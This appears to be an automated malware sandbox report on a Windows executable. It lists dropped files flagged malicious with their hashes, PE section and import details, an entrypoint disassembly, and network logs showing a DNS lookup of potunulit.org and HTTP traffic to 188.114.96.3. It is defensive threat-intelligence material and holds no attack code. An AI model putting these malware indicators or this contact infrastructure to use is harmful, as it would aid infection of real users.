Entropy (8bit):	7.533406928573143
Encrypted:	false
SSDEEP:	6144:324+ZV6NuvwV+hq3kd2UaXYnKUFWBMljuhLaWdTPk8SarppXad:YuNuvwUhq3kd2USYKUQ6ljkLaWdTPk8q
MD5:	F56B1B3FE0C50C6ED0FAD54627DF7A9A
SHA1:	05742C9AD28475C7AFDD3D6A63DD9200FC0B9F72
SHA-256:	E8F71DA41BBC272EF84589A7575B13B8B5D6D5D01796B3AF033682657263C53B
SHA-512:	FDE2089BCDF19CDB9D27763E4D3294A0E42CD0A3132463636610D85C3903B885BE6142D3B42204E89B76B5595E8B132580C8A5C60CED96D042AD96BCFE29B1C9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...r..c...........!.........\|............................................................@.............................s.......<............................`......................................................d...$............................text.............................. ..`.rdata...[.......\..................@..@.data...x....0......................@....00cfg.......P.......&..............@..@.reloc.......`.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C4AA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1642648
Entropy (8bit):	7.847643854402106
Encrypted:	false
SSDEEP:	49152:murDawItlpDZLPU/kHWGPaYE3Ku7ZKZ6nxvax85fCSuw:muPawItlpDZDU/kZPaYm/JvaxQCK
MD5:	EA25CE2F3580AF1DD771BAC5B0D2BF83
SHA1:	8A425695AE3154F222BA4A7A8AF03287D20F8BC4
SHA-256:	768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534
SHA-512:	70776BD050666D7ABCDB0668832A652FC4A67E45243DFD229520DA3712B85B506FFE9C3ED3C3C1E89F388C2D56B6E3FC8CDC31B35485FF1BA456F8A47277F0C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G.b...b...b...0>..b...0/..b...09..b.......b...b...b...00..b...0...b...b-..b...0+..b..Rich.b..........................PE..L....~.c......................#.....k.............@...........................9.....2[....@.....................................P.....6.0.....................9.........................................@...............`............................text...6........................... ..`.rdata...0.......2..................@..@.data...<. .........................@....rsrc...0.....6.....................@..@.reloc...I....9..J..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C676.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	417792
Entropy (8bit):	7.008431460440525
Encrypted:	false
SSDEEP:	6144:GILot0e73kNAn1SNCe64axZb30GvtQK/fu1d04DI12mTb:GIct0eLkPNL64Y91tQKXu1PDI12
MD5:	261B1DB94CCF4266128E2EB71A80FDA4
SHA1:	9D4CD03297F31EABE957F261DC7C3C6C268BD39F
SHA-256:	B0072463E78182E8D9721F91F889A62D9CE59A348FDDC5196B6201A5FA68B259
SHA-512:	2DD25970561CF9E3D946ACD891B601E6AA7E6563DDE6C10ED5AC1A6486BBC1851CF3908B5BDEE6C9B29633E51C90339209C50D97C0EA28B897BD6E7117B1AC7B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M_.`.>.3.>.3.>.3.lQ3->.3.l@3.>.3.lV3o>.3...3.>.3.>.3~>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3................PE..L......b.............................F............@.........................................................................T...d.... ..(............................................................-..@............................................text...8........................... ..`.data...............................@....huxuho.p...........................@..@.gini...............................@..@.vab................................@....rsrc...(.... ......................@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\beirutt

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	344064
Entropy (8bit):	6.5486278322749145
Encrypted:	false
SSDEEP:	6144:OnCLd9hqCWtvCuWxtt7Tfq3w2YJ5jq7VWRFBMolz90:OC/hqCJuWxttHn+7VWR5lz
MD5:	6DEF34B7D9603C4FC7953F177F73C21A
SHA1:	82D464AEDAE69E9FA5AD521CEED3840595F3AD2F
SHA-256:	277E1518B909735B16F393B7077E453735EB4D2DD651891F9F73DA605941493B
SHA-512:	751477B7F904ED0435E18A4435B54B049FFA65135B280549B0CB3CB378CEE462DC470C690927ED629F6F4B798E9EC5193AE1360ACBA34153AF5749015C546A9D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.`.>.3.>.3.>.3.lQ3.>.3.l@3.>.3.lV3.>.3...3.>.3.>.3.>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3........................PE..L.....b.....................n.......D............@.............................................................................d....................................................................-..@............................................text............................... ..`.data... ........p..................@....juv....p............f..............@..@.rur.................j..............@..@.cenepem.............n..............@....rsrc................r..............@..@.reloc...............&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5486278322749145
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	344064
MD5:	6def34b7d9603c4fc7953f177f73c21a
SHA1:	82d464aedae69e9fa5ad521ceed3840595f3ad2f
SHA256:	277e1518b909735b16f393b7077e453735eb4d2dd651891f9f73da605941493b
SHA512:	751477b7f904ed0435e18a4435b54b049ffa65135b280549b0cb3cb378cee462dc470c690927ed629f6f4b798e9ec5193ae1360acba34153af5749015c546a9d
SSDEEP:	6144:OnCLd9hqCWtvCuWxtt7Tfq3w2YJ5jq7VWRFBMolz90:OC/hqCJuWxttHn+7VWR5lz
TLSH:	B1749E01E2E87ED0F599CA318D2EA7EC363EFD514E156666322C7A3F29701E1C52A31D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.`.>.3.>.3.>.3.lQ3.>.3.l@3.>.3.lV3.>.3...3.>.3.>.3.>.3.l_3.>.3.lA3.>.3.lD3.>.3Rich.>.3........................PE..L......b...

File Icon


Icon Hash:	8494a69696b484e2

Static PE Info

General

Entrypoint:	0x40449f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x62BBE3DF [Wed Jun 29 05:32:15 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	861af707b319724b1132a7a971c54bc2

Entrypoint Preview

Instruction
call 00007F8B6CD1FFFEh
jmp 00007F8B6CD1C30Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00411008h+ecx*8]
je 00007F8B6CD1C4A5h
inc ecx
cmp ecx, 2Dh
jc 00007F8B6CD1C483h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F8B6CD1C4A0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041100Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F8B6CD1D69Dh
test eax, eax
jne 00007F8B6CD1C498h
mov eax, 00411170h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
xor eax, eax
cmp dword ptr [ebp+08h], eax
push 00000000h
sete al
push 00001000h
push eax
call dword ptr [004010CCh]
mov dword ptr [00427F60h], eax
test eax, eax
jne 00007F8B6CD1C494h
pop ebp
ret
xor eax, eax
inc eax
mov dword ptr [0042A204h], eax
pop ebp
ret
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 00427F68h
cmp dword ptr [00411184h+esi*8], 01h
jne 00007F8B6CD1C4B0h
lea eax, dword ptr [00411180h+esi*8]
mov dword ptr [eax], edi
push 00000FA0h
push dword ptr [eax]
add edi, 18h
call 00007F8B6CD1F88Ch
pop ecx
pop ecx
test eax, eax
je 00007F8B6CD1C49Eh
inc esi
cmp esi, 24h
jl 00007F8B6CD1C464h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf7b4	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x2b298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a000	0xaa0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2da8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf0f0	0xf200	False	0.5824832128099173	data	6.681630211805764	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x11000	0x19220	0x17000	False	0.9074388586956522	data	7.675700241362958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.juv	0x2b000	0x270	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rur	0x2c000	0x2d3	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.cenepem	0x2d000	0x3c3	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e000	0x2b298	0x2b400	False	0.5356642882947977	data	5.343845697441332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5a000	0x181a	0x1a00	False	0.3527644230769231	data	3.5621171270928884	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
AFX_DIALOG_LAYOUT	0x563f0	0x2	data
AFX_DIALOG_LAYOUT	0x563d8	0x2	data
AFX_DIALOG_LAYOUT	0x563e0	0xc	data
RT_CURSOR	0x563f8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0
RT_CURSOR	0x56728	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x56880	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_CURSOR	0x57728	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_CURSOR	0x57ff8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0x58128	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0
RT_ICON	0x2ee20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2fcc8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x30570	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x32b18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x33bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x34078	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x34740	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x36ce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x37180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x38028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x388d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x38e38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x3b3e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x3c488	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x3ce10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x3d2e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x3e188	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x3ea30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x3f0f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x3f660	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x41c08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x42cb0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x43180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON	0x44028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON	0x448d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors
RT_ICON	0x44f98	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON	0x45500	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON	0x47aa8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_ICON	0x48b50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304
RT_ICON	0x494d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024
RT_ICON	0x499b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x4a860	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x4b108	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x4b670	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x4dc18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x4ecc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x4f648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x4fb18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x509c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x51268	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x51930	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x51e98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x54440	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x554e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x55e70	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x58418	0x67c	data
RT_STRING	0x58a98	0x450	data
RT_STRING	0x58ee8	0x3ac	data
RT_ACCELERATOR	0x56350	0x58	data
RT_ACCELERATOR	0x563a8	0x30	data
RT_GROUP_CURSOR	0x56858	0x22	data
RT_GROUP_CURSOR	0x57fd0	0x22	data
RT_GROUP_CURSOR	0x581d8	0x22	data
RT_GROUP_ICON	0x4fab0	0x68	data
RT_GROUP_ICON	0x34028	0x4c	data
RT_GROUP_ICON	0x43118	0x68	data
RT_GROUP_ICON	0x37150	0x30	data
RT_GROUP_ICON	0x3d278	0x68	data
RT_GROUP_ICON	0x49940	0x76	data
RT_GROUP_ICON	0x562d8	0x76	data
RT_VERSION	0x58200	0x214	data

Imports

DLL	Import
KERNEL32.dll	GetCPInfo, FindResourceExW, EndUpdateResourceW, InterlockedIncrement, GetConsoleAliasA, SetConsoleActiveScreenBuffer, GetModuleHandleW, GetGeoInfoW, GetPriorityClass, GlobalAlloc, LoadLibraryW, CreateEventA, GetSystemWindowsDirectoryA, EnumSystemCodePagesA, GetNamedPipeInfo, GetDevicePowerState, IsBadStringPtrA, LCMapStringA, SetLastError, GetConsoleAliasExesA, GetProcAddress, VirtualAlloc, HeapSize, LoadLibraryA, OpenWaitableTimerW, DnsHostnameToComputerNameA, AddAtomW, GetCommMask, FoldStringW, lstrcmpiW, BuildCommDCBA, VirtualProtect, GetConsoleCursorInfo, GetVolumeNameForVolumeMountPointW, CreateWaitableTimerA, GetConsoleProcessList, EnumCalendarInfoExA, LCMapStringW, CreateFiber, lstrlenA, ReadConsoleOutputCharacterA, GetComputerNameA, GetLastError, HeapFree, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, WriteFile, GetStdHandle, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, GetLocaleInfoA, WideCharToMultiByte, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
USER32.dll	LoadMenuA, SetCaretPos, GetMenuItemID
GDI32.dll	GetCharWidthA
ADVAPI32.dll	BackupEventLogW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:28:11.568511009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586102009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.586241961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586745024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.586745977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.603856087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.603900909 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725743055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725814104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.725912094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.739520073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.739564896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.760066986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.760123014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821665049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821738005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821789980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821837902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821856976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.821885109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821911097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.821933985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.821981907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822033882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822046995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822108030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822256088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822305918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822354078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822366953 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.822397947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.822457075 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.864998102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865067959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865115881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865165949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865199089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865211010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865257025 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865258932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865307093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865343094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.865355968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.865415096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866022110 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866070986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866117954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866147041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866164923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866239071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866822004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866868019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866913080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.866947889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.866961002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867021084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.867681980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867774010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867818117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867851019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.867865086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.867933035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.870872974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.870923042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.870965004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.871004105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909089088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909207106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909255981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909269094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909321070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909351110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909368038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909418106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909440041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.909465075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909511089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.909528017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.910379887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910433054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910464048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.910480022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910528898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.910551071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911082029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911133051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911155939 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911180019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911226988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911274910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.911904097 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911952019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.911997080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912044048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912086010 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.912723064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912769079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912816048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:11.912816048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:11.912863016 CET	80	49736	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:28:11.521898031 CET	56807	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:11.545039892 CET	53	56807	8.8.8.8	192.168.2.4
Jan 25, 2023 09:28:27.594902039 CET	61007	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:27.617297888 CET	53	61007	8.8.8.8	192.168.2.4
Jan 25, 2023 09:28:29.245378017 CET	60686	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:29.266858101 CET	53	60686	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 09:28:11.521898031 CET	192.168.2.4	8.8.8.8	0xe307	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
